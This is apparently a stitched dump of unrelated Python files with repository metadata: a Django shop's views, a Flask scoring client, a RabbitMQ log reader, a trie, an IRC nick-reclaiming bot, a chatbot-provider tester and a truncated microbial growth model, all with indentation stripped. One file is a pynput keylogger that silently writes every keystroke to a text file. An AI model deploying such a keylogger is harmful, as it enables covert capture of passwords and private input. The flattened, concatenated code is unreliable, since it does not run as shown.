template_name = 'product_detail.html'
queryset = ProdukItem.objects.all()
class CheckoutView(LoginRequiredMixin, generic.FormView):
def get(self, *args, **kwargs):
form = CheckoutForm()
try:
order = Order.objects.get(user=self.request.user, ordered=False)
if order.produk_items.count() == 0:
messages.warning(self.request, 'Belum ada belajaan yang Anda pesan, lanjutkan belanja')
return redirect('toko:home-produk-list')
except ObjectDoesNotExist:
order = {}
messages.warning(self.request, 'Belum ada belajaan yang Anda pesan, lanjutkan belanja')
return redirect('toko:home-produk-list')
context = {
'form': form,
'keranjang': order,
}
template_name = 'checkout.html'
return render(self.request, template_name, context)
def post(self, *args, **kwargs):
form = CheckoutForm(self.request.POST or None)
try:
order = Order.objects.get(user=self.request.user, ordered=False)
if form.is_valid():
alamat_1 = form.cleaned_data.get('alamat_1')
alamat_2 = form.cleaned_data.get('alamat_2')
negara = form.cleaned_data.get('negara')
kode_pos = form.cleaned_data.get('kode_pos')
opsi_pembayaran = form.cleaned_data.get('opsi_pembayaran')
alamat_pengiriman = AlamatPengiriman(
user=self.request.user,
alamat_1=alamat_1,
alamat_2=alamat_2,
negara=negara,
kode_pos=kode_pos,
)
alamat_pengiriman.save()
order.alamat_pengiriman = alamat_pengiriman
order.save()
if opsi_pembayaran == 'P':
return redirect('toko:payment', payment_method='paypal')
else:
return redirect('toko:payment', payment_method='stripe')
messages.warning(self.request, 'Gagal checkout')
return redirect('toko:checkout')
except ObjectDoesNotExist:
messages.error(self.request, 'Tidak ada pesanan yang aktif')
return redirect('toko:order-summary')
class PaymentView(LoginRequiredMixin, generic.FormView):
def get(self, *args, **kwargs):
template_name = 'payment.html'
try:
order = Order.objects.get(user=self.request.user, ordered=False)
paypal_data = {
'business': settings.PAYPAL_RECEIVER_EMAIL,
'amount': order.get_total_harga_order,
'item_name': f'Pembayaran belajanan order: {order.id}',
'invoice': f'{order.id}-{timezone.now().timestamp()}' ,
'currency_code': 'USD',
'notify_url': self.request.build_absolute_uri(reverse('paypal-ipn')),
'return_url': self.request.build_absolute_uri(reverse('toko:paypal-return')),
'cancel_return': self.request.build_absolute_uri(reverse('toko:paypal-cancel')),
}
qPath = self.request.get_full_path()
isPaypal = 'paypal' in qPath
form = PayPalPaymentsForm(initial=paypal_data)
context = {
'paypalform': form,
'order': order,
'is_paypal': isPaypal,
}
return render(self.request, template_name, context)
except ObjectDoesNotExist:
return redirect('toko:checkout')
class OrderSummaryView(LoginRequiredMixin, generic.TemplateView):
def get(self, *args, **kwargs):
try:
order = Order.objects.get(user=self.request.user, ordered=False)
context = {
'keranjang': order
}
template_name = 'order_summary.html'
return render(self.request, template_name, context)
except ObjectDoesNotExist:
messages.error(self.request, 'Tidak ada pesanan yang aktif')
return redirect('/')
def add_to_cart(request, slug):
if request.user.is_authenticated:
produk_item = get_object_or_404(ProdukItem, slug=slug)
order_produk_item, _ = OrderProdukItem.objects.get_or_create(
produk_item=produk_item,
user=request.user,
ordered=False
)
order_query = Order.objects.filter(user=request.user, ordered=False)
if order_query.exists():
order = order_query[0]
if order.produk_items.filter(produk_item__slug=produk_item.slug).exists():
order_produk_item.quantity += 1
order_produk_item.save()
pesan = f"ProdukItem sudah diupdate menjadi: { order_produk_item.quantity }"
messages.info(request, pesan)
return redirect('toko:produk-detail', slug = slug)
else:
order.produk_items.add(order_produk_item)
messages.info(request, 'ProdukItem pilihanmu sudah ditambahkan')
return redirect('toko:produk-detail', slug = slug)
else:
tanggal_order = timezone.now()
order = Order.objects.create(user=request.user, tanggal_order=tanggal_order)
order.produk_items.add(order_produk_item)
messages.info(request, 'ProdukItem pilihanmu sudah ditambahkan')
return redirect('toko:produk-detail', slug = slug)
else:
return redirect('/accounts/login')
def remove_from_cart(request, slug):
if request.user.is_authenticated:
produk_item = get_object_or_404(ProdukItem, slug=slug)
order_query = Order.objects.filter(
user=request.user, ordered=False
)
if order_query.exists():
order = order_query[0]
if order.produk_items.filter(produk_item__slug=produk_item.slug).exists():
try:
order_produk_item = OrderProdukItem.objects.filter(
produk_item=produk_item,
user=request.user,
ordered=False
)[0]
order.produk_items.remove(order_produk_item)
order_produk_item.delete()
pesan = f"ProdukItem sudah dihapus"
messages.info(request, pesan)
return redirect('toko:produk-detail',slug = slug)
except ObjectDoesNotExist:
print('Error: order ProdukItem sudah tidak ada')
else:
messages.info(request, 'ProdukItem tidak ada')
return redirect('toko:produk-detail',slug = slug)
else:
messages.info(request, 'ProdukItem tidak ada order yang aktif')
return redirect('toko:produk-detail',slug = slug)
else:
return redirect('/accounts/login')
# @csrf_exempt
def paypal_return(request):
if request.user.is_authenticated:
try:
print('paypal return', request)
order = Order.objects.get(user=request.user, ordered=False)
payment = Payment()
payment.user=request.user
payment.amount = order.get_total_harga_order()
payment.payment_option = 'P' # paypal kalai 'S' stripe
payment.charge_id = f'{order.id}-{timezone.now()}'
payment.timestamp = timezone.now()
payment.save()
order_produk_item = OrderProdukItem.objects.filter(user=request.user,ordered=False)
order_produk_item.update(ordered=True)
order.payment = payment
order.ordered = True
order.save()
messages.info(request, 'Pembayaran sudah diterima, terima kasih')
return redirect('toko:home-produk-list')
except ObjectDoesNotExist:
messages.error(request, 'Periksa kembali pesananmu')
return redirect('toko:order-summary')
else:
return redirect('/accounts/login')
# @csrf_exempt
def paypal_cancel(request):
messages.error(request, 'Pembayaran dibatalkan')
return redirect('toko:order-summary')
def filter_products(request):
filtered_products = None
selected_kategori = request.GET.getlist('kategori')
selected_tags = request.GET.getlist('tags')
if selected_kategori or selected_tags:
filtered_products = ProdukItem.objects.all()
if selected_kategori:
filtered_products = filtered_products.filter(kategori__in=selected_kategori)
if selected_tags:
filtered_products = filtered_products.filter(label__in=selected_tags)
else:
filtered_products = ProdukItem.objects.all()
return render(request, 'list_produk.html', {'object_list': filtered_products})
def pencarian_barang(request):
keyword = request.GET.get('keyword')
if keyword:
barang = ProdukItem.objects.filter(nama_produk__icontains=keyword)
else:
barang = None
return render(request, 'list_produk.html', {'object_list': barang})
def update_quantity(request: HttpRequest):
if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':
product_id = request.POST.get('product_id')
action = request.POST.get('action')
total = 0.0
hemat = 0.0
total_all = None
total_hemat = None
try:
product = OrderProdukItem.objects.get(id=product_id)
if action == 'increase':
product.quantity += 1
elif action == 'decrease':
if product.quantity > 1:
product.quantity -= 1
product.save()
if product.produk_item.harga_diskon:
total = product.get_total_harga_diskon_item()
hemat = product.get_total_hemat_item()
else :
total = product.get_total_harga_item()
return JsonResponse({'quantity': product.quantity, 'total':total, 'hemat':hemat})
except OrderProdukItem.DoesNotExist:
return JsonResponse({'error': 'Product not found'}, status=400)
return JsonResponse({'error': 'Invalid request'}, status=400)
def reduce_from_cart(request, slug):
if request.user.is_authenticated:
produk_item = get_object_or_404(ProdukItem, slug=slug)
order_produk_item, _ = OrderProdukItem.objects.get_or_create(
produk_item=produk_item,
user=request.user,
ordered=False
)
order_query = Order.objects.filter(user=request.user, ordered=False)
if order_query.exists():
order = order_query[0]
if order.produk_items.filter(produk_item__slug=produk_item.slug).exists():
if order_produk_item.quantity > 1 :
order_produk_item.quantity -= 1
order_produk_item.save()
pesan = f"ProdukItem sudah diupdate menjadi: { order_produk_item.quantity }"
messages.info(request, pesan)
else:
pesan = f"Produk Item tidak bisa di update"
messages.warning(request, pesan)
return redirect('toko:produk-detail', slug = slug)
else:
messages.info(request, 'ProdukItem pilihanmu tidak ada pada keranjang')
return redirect('toko:produk-detail', slug = slug)
else:
messages.info(request, 'ProdukItem pilihanmu tidak ada pada keranjang')
return redirect('toko:produk-detail', slug = slug)
else:
return redirect('/accounts/login')
def cari_produk(request, kategori):
produk = ProdukItem.objects.filter(kategori=kategori)
return render(request, 'list_produk.html', {'object_list': produk})
# def update_cart(request, slug):
# def get(self, *args, **kwargs):
# if request.user.is_authenticated:
# produk_item = get_object_or_404(ProdukItem, slug=slug)
# order_produk_item, _ = OrderProdukItem.objects.get_or_create(
# produk_item=produk_item,
# user=request.user,
# ordered=False
# )
# order_query = Order.objects.filter(user=request.user, ordered=False)
# if order_query.exists():
# order = order_query[0]
# if order.produk_items.filter(produk_item__slug=produk_item.slug).exists():
# order_produk_item.quantity += 1
# order_produk_item.save()
# order = Order.objects.get(user=self.request.user, ordered=False)
# context = {
# 'keranjang': order
# }
# template_name = 'order_summary.html'
# return render(self.request, template_name, context)
# else:
# return redirect('/accounts/login')
|
ifty123/ecomm_fix
|
ecomm/toko/views.py
|
views.py
|
py
| 14,172 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71087029308
|
"""Simple wrapper for app"""
import json
from rich.console import Console
from typing import List
import requests
from src.utils import Oracles
class FlaskAppClient:
ERROR_KEY = "error"
TRACEBACK_KEY = "traceback"
def __init__(self, base_url="http://127.0.0.1:5000"):
self.base_url = base_url
self.console = Console()
def _handle_response(self, response):
try:
response_data = response.json()
except json.JSONDecodeError:
self.console.print("[red]Failed to parse server response as JSON[/red]")
self.console.print("Response from server: " + str(response))
response.raise_for_status() # This will raise an HTTPError if the HTTP request returned an unsuccessful status code.
if response.status_code == 200:
return response_data
else:
error = response_data.get(self.ERROR_KEY, 'Unknown error')
tb = response_data.get(self.TRACEBACK_KEY, None)
self.console.print(f"[red]Server error: {error}[/red]")
if tb:
self.console.print(f"[yellow]{tb}[/yellow]")
raise RuntimeError(f"Server error: {error}")
def all_results(self):
response = requests.post(f"{self.base_url}/all_results", json={})
return self._handle_response(response)
def all_scores(self, user_token):
payload = {
"token": user_token
}
response = requests.post(f"{self.base_url}/all_scores", json=payload)
return self._handle_response(response)
def score_compounds_and_update_leaderboard(self, compounds, oracle_name, user_token):
payload = {
"compounds": ",".join(compounds),
"oracle_name": oracle_name,
"token": user_token
}
response = requests.post(f"{self.base_url}/score_compounds_and_update_leaderboard", json=payload)
return self._handle_response(response)
# Usage Example:
if __name__ == "__main__":
client = FlaskAppClient()
token = "test-0"
# Example for scoring compounds
compounds = ["CC", "CCC"]
oracle_name = "DRD2"
response = client.score_compounds_and_update_leaderboard(compounds, oracle_name, token)
print(response)
# Example of error handling
compounds = ["Cxxxxx"]
oracle_name = "DRD2"
response = client.score_compounds_and_update_leaderboard(compounds, oracle_name, token)
print(response)
|
molecule-one/mlinpl-23-workshops
|
src/server_wrapper.py
|
server_wrapper.py
|
py
| 2,462 |
python
|
en
|
code
| 1 |
github-code
|
6
|
10906525746
|
import argparse
import time
import pika
from pika.exceptions import (
ChannelClosed,
ConnectionClosed,
AMQPConnectionError,
AMQPHeartbeatTimeout,
)
class Logger:
LOG_EXCHANGE = "logs"
LOG_EXCHANGE_TYPE = "topic"
def __init__(self, url, routing_keys):
connection = pika.BlockingConnection(pika.URLParameters(url))
channel = connection.channel()
channel.exchange_declare(
exchange=self.LOG_EXCHANGE,
exchange_type=self.LOG_EXCHANGE_TYPE,
durable=True,
)
# We declare a transient queue because we don't want to fill-up rabbitmq
# with logs if the logger is down
result = channel.queue_declare("", exclusive=True)
queue_name = result.method.queue
for key in routing_keys:
channel.queue_bind(exchange="logs", queue=queue_name, routing_key=key)
# Logger queue is auto ack for minimum overhead as we don't care losing some
# messages (very rare as we rarely fail)
channel.basic_consume(
queue=queue_name, on_message_callback=self.callback, auto_ack=True
)
self._channel = channel
self._connection = connection
def callback(self, ch, method, properties, body):
print("[{}] {}".format(method.routing_key, body.decode("utf-8")))
def run(self):
try:
self._channel.start_consuming()
except KeyboardInterrupt:
return True
except (
ChannelClosed,
ConnectionClosed,
AMQPConnectionError,
AMQPHeartbeatTimeout,
):
return False
finally:
if not self._connection.is_closed:
self._connection.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Display selected logs in realtime on the given broker"
)
parser.add_argument("amqp_url", help="URL of the broker, including credentials")
parser.add_argument(
"--filter",
help="Log patterns to subscribe to (default to all)",
nargs="*",
default=["#"],
)
args = parser.parse_args()
expected_stop = False
print("Ctrl-C to quit.")
print("Subcribing to logs:", args.filter)
while not expected_stop:
try:
logger = Logger(args.amqp_url, args.filter)
except AMQPConnectionError:
print("could not connect; retry…")
time.sleep(2)
continue
print("connected!")
expected_stop = logger.run()
print("bye!")
|
allo-media/eventail
|
scripts/logger.py
|
logger.py
|
py
| 2,599 |
python
|
en
|
code
| 2 |
github-code
|
6
|
29209651660
|
import os
from pathlib import Path
def correct_content(req):
with open(req, "rb") as fp:
content = fp.read()
try:
if b"\x00" in content:
raise ValueError()
content = content.decode("utf-8")
except (UnicodeDecodeError, ValueError):
content = (
content.replace(b"\xff", b"")
.replace(b"\xfe", b"")
.replace(b"\x00", b"")
.decode("utf-8")
)
with open(req, "w") as fp:
fp.write(content)
return content
def main():
root = Path("src", "tests4py", "projects", "resources")
assert root.exists() and root.is_dir(), f"Wrong cwd {Path.cwd()}"
for p in os.listdir(root):
project = root / p
default_req = project / "requirements.txt"
default_content = ""
if default_req.exists():
default_content = correct_content(default_req)
if p != "__pycache__" and project.is_dir():
reqs = dict()
for b in os.listdir(project):
bug = project / b
if bug.is_dir():
req = bug / "requirements.txt"
if req.exists():
print(req)
reqs[b] = correct_content(req)
elif default_req.exists():
reqs[b] = default_content
if len(reqs) > 0:
count = dict()
for r in reqs.values():
if r in count:
count[r] += 1
else:
count[r] = 1
r = max(count, key=count.get)
if count[r] > 1:
with open(default_req, "w") as fp:
fp.write(r)
for b in reqs:
if r == reqs[b] and (project / b / "requirements.txt").exists():
os.remove(project / b / "requirements.txt")
if __name__ == "__main__":
main()
|
smythi93/Tests4Py
|
requirements.py
|
requirements.py
|
py
| 2,015 |
python
|
en
|
code
| 8 |
github-code
|
6
|
29465067093
|
# Return the number (count) of vowels in the given string.
# We will consider a, e, i, o, u as vowels for this Kata (but not y).
# The input string will only consist of lower case letters and/or spaces.
def get_count(sentence):
# create a count variable for the vowels in the sentence
num_vowels = 0
# create a list of possible vowels
vowels = ['a', 'e', 'i', 'o', 'u']
# loop through each letter in the sentence
for char in sentence:
# if the lette is in the vowels list, update the count variable
if char in vowels:
num_vowels += 1
# return the total variable count
return num_vowels
# import codewars_test as test
# from solution import get_count
# @test.describe("Sample tests")
# def sample_tests():
# @test.it("Should count all vowels")
# def all_vowels():
# test.assert_equals(get_count("aeiou"), 5, f"Incorrect answer for \"aeiou\"")
# @test.it("Should not count \"y\"")
# def only_y():
# test.assert_equals(get_count("y"), 0, f"Incorrect answer for \"y\"")
# @test.it("Should return 0 when no vowels")
# def no_vowels():
# test.assert_equals(get_count("bcdfghjklmnpqrstvwxz y"), 0, f"Incorrect answer for \"bcdfghjklmnpqrstvwxz y\"")
# @test.it("Should return 0 for empty string")
# def no_vowels():
# test.assert_equals(get_count(""), 0, f"Incorrect answer for empty string")
# @test.it("Should return 5 for \"abracadabra\"")
# def test_abracadabra():
# test.assert_equals(get_count("abracadabra"), 5, f"Incorrect answer for \"abracadabra\"")
|
tuyojr/code_wars-hacker_rank-leetcode
|
code_wars/get_count.py
|
get_count.py
|
py
| 1,679 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21247797774
|
import os
import pandas as pd
from sklearn.model_selection import train_test_split
import click
FILENAME_DATA = "data.csv"
FILENAME_TARGET = "target.csv"
FILENAME_TRAIN_X = "X_train.csv"
FILENAME_TRAIN_Y = "y_train.csv"
FILENAME_TEST_X = "X_test.csv"
FILENAME_TEST_Y = "y_test.csv"
@click.command("split_data")
@click.option("--input-dir")
@click.option("--output-dir")
@click.option("--size", type=float)
@click.option("--random-state", type=int)
def split_data(input_dir: str, output_dir: str, size: float, random_state: int):
path_data = os.path.join(input_dir, FILENAME_DATA)
features_df = pd.read_csv(path_data)
X_train, X_test = train_test_split(features_df, test_size=size, random_state=random_state)
path_target = os.path.join(input_dir, FILENAME_TARGET)
target_df = pd.read_csv(path_target)
y_train, y_test = train_test_split(target_df, test_size=size, random_state=random_state)
os.makedirs(output_dir, exist_ok=True)
X_train.to_csv(os.path.join(output_dir, FILENAME_TRAIN_X), index=False)
X_test.to_csv(os.path.join(output_dir, FILENAME_TEST_X), index=False)
y_train.to_csv(os.path.join(output_dir, FILENAME_TRAIN_Y), index=False)
y_test.to_csv(os.path.join(output_dir, FILENAME_TEST_Y), index=False)
if __name__ == '__main__':
split_data()
|
made-mlops-2022/alexey_sklyannyy
|
airflow_ml_dags/images/airflow-split/split_data.py
|
split_data.py
|
py
| 1,308 |
python
|
en
|
code
| 0 |
github-code
|
6
|
13092352572
|
# encoding = utf-8
class Trie(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = {}
self.end = -1
def insert(self, word):
"""
Inserts a word into the trie.
:type word: str
:rtype: void
"""
curNode = self.root
for c in word:
if not c in curNode:
curNode[c] = {}
curNode = curNode[c]
curNode[self.end] = True
def search(self, word):
"""
Returns if the word is in the trie.
:type word: str
:rtype: bool
"""
curNode = self.root
for c in word:
if not c in curNode:
return False
curNode = curNode[c]
# Doesn't end here
if not self.end in curNode:
return False
return True
def startsWith(self, prefix):
"""
Returns if there is any word in the trie that starts with the given prefix.
:type prefix: str
:rtype: bool
"""
curNode = self.root
for c in prefix:
if not c in curNode:
return False
curNode = curNode[c]
return True
def get_start(self,prefix):
'''
给出一个前辍,打印出所有匹配的字符串
:param prefix:
:return:
'''
def get_key(pre,pre_node):
result = []
if pre_node.get(self.end):
result.append(pre)
for key in pre_node.keys():
if key != self.end:
result.extend(get_key(pre+key,pre_node.get(key)))
return result
if not self.startsWith(prefix):
return []
else:
node = self.root
for p in prefix:
node = node.get(p)
else:
return get_key(prefix,node)
@staticmethod
def levenshtein_dp(s: str, t: str) -> int:
'''
计算莱文斯坦距离(Levenshtein distance),距离越小,说明两个单词越相近
:param s:
:param t:
:return:
'''
m, n = len(s), len(t)
table = [[0] * (n + 1) for _ in range(m + 1)]
table[0] = [j for j in range(n + 1)]
# print(table)
for i in range(m + 1):
table[i][0] = i
for i in range(1, m + 1):
for j in range(1, n + 1):
table[i][j] = min(1 + table[i - 1][j], 1 + table[i][j - 1],
int(s[i - 1] != t[j - 1]) + table[i - 1][j - 1])
for t in table:
print(t)
return table[-1][-1]
def get_all_words_of_trie(self):
words = []
for k in self.root.keys():
words.extend(self.get_start(k))
return words
def get_right_word(self,input_word):
'''
输入一个单词,返回正确的单词
:param input_word:
:return:
'''
words = self.get_all_words_of_trie()
right_word = input_word
min_distance = 99999
for item in words:
distance = self.levenshtein_dp(input_word,item)
if min_distance > distance:
min_distance = distance
right_word = item
return right_word
if __name__ == "__main__":
trie = Trie()
trie.insert("中")
trie.insert("中国")
trie.insert("中国人")
trie.insert("中华人民共和国")
# print(trie.root)
trie.insert("Python")
trie.insert("Python 算法")
trie.insert("Python web")
trie.insert("Python web 开发")
trie.insert("Python web 开发 视频教程")
trie.insert("Python 算法 源码")
trie.insert("Perl 算法 源码")
# print(trie.search("Perl"))
# print(trie.search("Perl 算法 源码"))
# print((trie.get_start('P')))
# print((trie.get_start('Python web')))
# print((trie.get_start('Python 算')))
# print(trie.get_all_words_of_trie())
print(trie.levenshtein_dp("facbok","facebook"))
|
somenzz/geekbang
|
algorthms/trie.py
|
trie.py
|
py
| 4,115 |
python
|
en
|
code
| 5 |
github-code
|
6
|
23800674981
|
from pynput.keyboard import Key,Listener
keys=[]
def on_press(key):
try:
key=str(key)
if(key=='Key.enter'):
key='\n'
elif(key=='Key.space'):
key=' '
elif(key=='Key.alt'):
key=' alt '
elif(key=='Key.ctrl'):
key=' ctrl '
elif(key=='Key.backspace'):
key=' backspace '
elif(Key=='Key.shift'):
key=' shift '
f=open('a.txt','a')
key=key.strip('\'')
f.write(key)
except Exception as e:
print(e)
f.close()
#print("{0} pressed".format(key))
#def on_release(key):
# if(key==Key.esc):
# return False
try:
with Listener(on_press=on_press) as listener:
listener.join()
except:
print('\n...')
|
prajwalcbk/tools
|
keylogger/3.py
|
3.py
|
py
| 791 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30247773703
|
import random
# Split string method
names_string = input("Give me everybody's names, separated by a comma. ")
names = names_string.split(", ")
# 🚨 Don't change the code above 👆
#Write your code below this line 👇
number_of_names = len(names)
random_name = random.randint(0, number_of_names - 1)
buyer = names[random_name]
#line below is a shorter way of writing this code
#buyer = random.choice(names)
print(buyer + " is going to buy the meal today!")
|
ramirors1/Random-name
|
main.py
|
main.py
|
py
| 470 |
python
|
en
|
code
| 0 |
github-code
|
6
|
18658019054
|
'''
Created on Dec 13, 2022
@author: balut
'''
from erorrs.Errors import RepositoryException
from domain.entities import Bicicleta
class InFileRepositoryBiciclete(object):
'''
classdocs
'''
def __init__(self, fileName):
'''
Constructor
'''
self.__produse = []
self.__fileName = fileName
self.__loadFromFile()
def __exists(self, b):
for p in self.__produse:
if p.getID() == b.getID():
raise RepositoryException(
"!!!Bicicleta exista deja in lista de produse!!!\n")
def __store(self, b):
self.__exists(b)
self.__produse.append(b)
def __loadFromFile(self):
with open(self.__fileName, "r") as f:
lines = f.readlines()
for line in lines:
line = line.strip()
line = line.split(";")
id = int(line[0])
tip = line[1]
pret = float(line[2])
b = Bicicleta(id, tip, pret)
self.__store(b)
f.close()
def __saveToFile(self):
with open(self.__fileName, "w") as f:
for b in self.__produse:
strB = str(b.getID()) + ";" + b.getTip() + \
";" + str(b.getPret()) + "\n"
f.write(strB)
f.close()
def __findOne(self, id):
for b in self.__produse:
if b.getID() == id:
return b
raise RepositoryException(
"!!!Bicicleta nu exista in lista de produse!!!")
def get_all(self):
return self.__produse
def deleteByTip(self, tip):
self.__produse = [x for x in self.__produse if x.getTip() != tip]
self.__saveToFile()
def deleteByMax(self, maxx):
self.__produse = [x for x in self.__produse if x.getPret() != maxx]
self.__saveToFile()
def delete(self, id):
deleted = self.__findOne(id)
self.__produse.remove(deleted)
self.__saveToFile()
return deleted
|
Baluta-Lucian/FP
|
Projects/MagazinBicicleteSimulare/repository/InFileRepositoryBiciclete.py
|
InFileRepositoryBiciclete.py
|
py
| 2,069 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71271494589
|
dna = input()
new = ""
for i in dna:
if i not in 'ATGC':
new = "Invalid Input"
break
if i == 'A':
new += 'U'
elif i == 'C':
new += 'G'
elif i == 'T':
new += 'A'
else:
new += 'C'
print(new)
#or you can use this
b=input()
a="GCTA";c="CGAU"
try:print(''.join([c[a.index(i)]for i in b]))
except:print("Invalid Input")
|
anubhavsrivastava10/Leetcode-HackerEarth-Solution
|
HackerEarth/Jadoo and DNA Transcription.py
|
Jadoo and DNA Transcription.py
|
py
| 385 |
python
|
en
|
code
| 9 |
github-code
|
6
|
36417191928
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:
l = head
r = head
while r != None and r.next != None:
r = r.next.next
l = l.next
return l
|
eyosiasbitsu/Competitive-programming-A2SV
|
Project Phase Camp/0876-middle-of-the-linked-list/0876-middle-of-the-linked-list.py
|
0876-middle-of-the-linked-list.py
|
py
| 443 |
python
|
en
|
code
| 3 |
github-code
|
6
|
33869960923
|
import fasttext
import pickle
model = fasttext.load_model('/data/disk1/private/yx/model200v2_8.bin', encoding='utf-8')
(wordnum,vec_size) = (len(model.words),model.dim)
word2id = {}
vecList = []
for idx,word in enumerate(model.words):
word2id[word] = idx
vecList.append(model[word])
with open("/data/disk1/private/yx/word2id.pkl","wb") as f:
pickle.dump((wordnum,vec_size),f)
pickle.dump(word2id,f)
import numpy as np
vecnp = np.asarray(vecList)
print(vecnp.shape)
np.save("/data/disk1/private/yx/vec_nor.npy",vecnp)
|
xcjthu/TopTextClassification
|
utils/powerlawtools/fastmodeltrans.py
|
fastmodeltrans.py
|
py
| 533 |
python
|
en
|
code
| 3 |
github-code
|
6
|
24742947009
|
from asyncirc import irc
import asyncirc.plugins.sasl
import asyncio, configparser, time, sys
config = configparser.ConfigParser(interpolation=None)
config.read('config.ini')
network = config["DEFAULT"]["network"]
server = config[network]["server"]
port = config[network]["port"]
nick = config[network]['nick']
password = config[network]['password']
conn = irc.connect(server, port, use_ssl=True)
conn.register(nick, nick, nick)
asyncirc.plugins.sasl.auth(bot_nick, bot_password)
nicks_to_renew = []
nick_to_try = ""
@conn.on("irc-001")
def query_for_nicks(message):
print("Querying NickServ for list of nicks")
conn.say("NickServ", "info")
@conn.on("private-notice")
def extract_nicks(message, user, target, text):
if message.source != "NickServ!NickServ@services.":
print("Notice from user {}: {}".format(user.user, text))
return
if text.startswith("Nicks"):
global nicks_to_renew
nicks = text.split(":", 1)[1].strip()
nicks_to_renew += [nick for nick in nicks.split()
if nick != bot_nick]
print("Added `{}' to list of nicks".format(nicks))
elif "End of Info" in text:
# Run the first renew try at the end of the nickserv info
renew_next()
@conn.on("irc-nick")
def renew_next(message=""):
# Sleep 5 seconds before trying to renew a nick, due to nick changing rate limiting
time.sleep(5)
try:
global nick_to_try
nick_to_try = nicks_to_renew.pop()
except IndexError:
# Exit when we have no more nicks to renew
print("All nicks renewed. Exiting...")
conn.anything("QUIT :Done...")
sys.exit(0)
print("Trying to renew nick `{}'".format(nick_to_try))
conn.writeln("NICK {}".format(nick_to_try))
@conn.on("irc-433")
def nick_in_use(message):
print("Nickname `{}' is already in use. Skipping...".format(nick_to_try))
renew_next()
@conn.on("irc-437")
def nick_unavailable(message):
print("Nick `{}' is marked temporarily unavailable, releasing it...".format(nick_to_try))
conn.say("NickServ", "RELEASE {}".format(nick_to_try))
print("Retrying renew of `{}'".format(nick_to_try))
global nicks_to_renew
nicks_to_renew.append(nick_to_try)
renew_next()
@conn.on("irc-438")
def nick_change_ratelimit(message):
global nicks_to_renew
nicks_to_renew.append(nick_to_try)
print("Nick changing was rate limited, waiting 20 seconds")
time.sleep(20)
print("Nick changing resuming")
renew_next()
if __name__ == '__main__':
asyncio.get_event_loop().run_forever()
|
kyrias/reclaimer
|
reclaimer.py
|
reclaimer.py
|
py
| 2,611 |
python
|
en
|
code
| 2 |
github-code
|
6
|
32161722151
|
import sys
from pathlib import Path
from colorama import Fore
sys.path.append(str(Path(__file__).parent.parent))
from g4f import BaseProvider, models, Provider
logging = False
class Styles:
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def main():
providers = get_providers()
failed_providers = []
for _provider in providers:
if _provider.needs_auth:
continue
print("Provider:", _provider.__name__)
result = test(_provider)
print("Result:", result)
if _provider.working and not result:
failed_providers.append(_provider)
print()
if failed_providers:
print(f"{Fore.RED + Styles.BOLD}Failed providers:{Styles.ENDC}")
for _provider in failed_providers:
print(f"{Fore.RED}{_provider.__name__}")
else:
print(f"{Fore.GREEN + Styles.BOLD}All providers are working")
def get_providers() -> list[type[BaseProvider]]:
provider_names = dir(Provider)
ignore_names = [
"annotations",
"base_provider",
"BaseProvider",
"AsyncProvider",
"AsyncGeneratorProvider"
]
provider_names = [
provider_name
for provider_name in provider_names
if not provider_name.startswith("__") and provider_name not in ignore_names
]
return [getattr(Provider, provider_name) for provider_name in provider_names]
def create_response(_provider: type[BaseProvider]) -> str:
if _provider.supports_gpt_35_turbo:
model = models.gpt_35_turbo.name
elif _provider.supports_gpt_4:
model = models.gpt_4.name
else:
model = models.default.name
response = _provider.create_completion(
model=model,
messages=[{"role": "user", "content": "Hello, who are you? Answer in detail much as possible."}],
stream=False,
)
return "".join(response)
def test(_provider: type[BaseProvider]) -> bool:
try:
response = create_response(_provider)
assert type(response) is str
assert len(response) > 0
return response
except Exception as e:
if logging:
print(e)
return False
if __name__ == "__main__":
main()
|
dovgan-developer/discord-bot-g4f
|
testing/test_providers.py
|
test_providers.py
|
py
| 2,239 |
python
|
en
|
code
| 1 |
github-code
|
6
|
14069562246
|
''''
Microbial growth model for A. Niger
including inhibition dynamics based on Haldane's equation
'''
##############################################################################
mic_name = 'A. niger'
print( '\n'*2, 'Summary of params used for species ', mic_name)
# Imports
from inhibition import load_csv
import matplotlib.pyplot as plt
import numpy as np
from scipy.integrate import odeint
from lmfit import Parameters, fit_report, minimize
from inhibition import plot_inhibition_curves, haldane_3_products
from control import show_fig
from control import fit_report_toggle
#######################################################################################
# Import dataset to fit model parameters:
# Inlcude, biomass optimal density and Cyanide concentration over time
# Extract required variables from measured data and carry out conversion
# Load measure data
measured_data, header = load_csv( 'CETIM - A niger data 1')
print('\nRaw measured data')
print(header, measured_data)
# Extract states
states_m = measured_data[:, 1:4] # states measured
state_names = header[1:4]
print('\nRaw extracted states')
print(state_names, '\n', states_m)
# Extract times at which to evalutate the solution of the ODE system
times_m = measured_data[:, 0]
print('\nMeasurement times')
print(header[0], times_m)
# Data cleaning
times_m = times_m[3:-1] - times_m[3]
states_m = states_m[3:-1,:]
# Set initial states
innoculum_size_0 = 1e5 #1.3e8
conversion_factor_IS = 1e-8 # # grams/cell
cX_0 = innoculum_size_0 * conversion_factor_IS
print('\nInitial measured states')
initial_states = [ cX_0, 25, *states_m[0,:] ] # 5 g glycine
print(initial_states)
# Data cleaning
# for ax in range(0,1):
# states_m = np.delete( states_m, [1, 2], ax )
# times_m = np.delete( times_m, [1, 2], ax )
#######################################################################################
# Build model and define regression function
# Define model for parameter fitting
# def monod(f, t, umax, Ks, Yps, Yxs):
# X = f[0]
# S = f[1]
# P = f[2]
# u = umax * (S / (Ks + S))
# dXdt = u * X
# dSdt = -dXdt / Yxs
# dPdt = (-dSdt) * Yps
# dfdt = [dXdt, dSdt, dPdt]
# return dfdt
def monod( f, t, *args ):
'''
System of differential equations for:
1) Biomass production, x (Monod dynamics assumed)
2) Substrate consumption, s
3) Organic acid production, p
pgl -> gluconic acid
pox -> oxalic acid
pci -> citric acid
'''
# Element-wise unpacking of vectorised solution, f
x = f[0]
s = f[1]
if s <= 0:
return np.zeros(5)
else:
# Biomass production rate
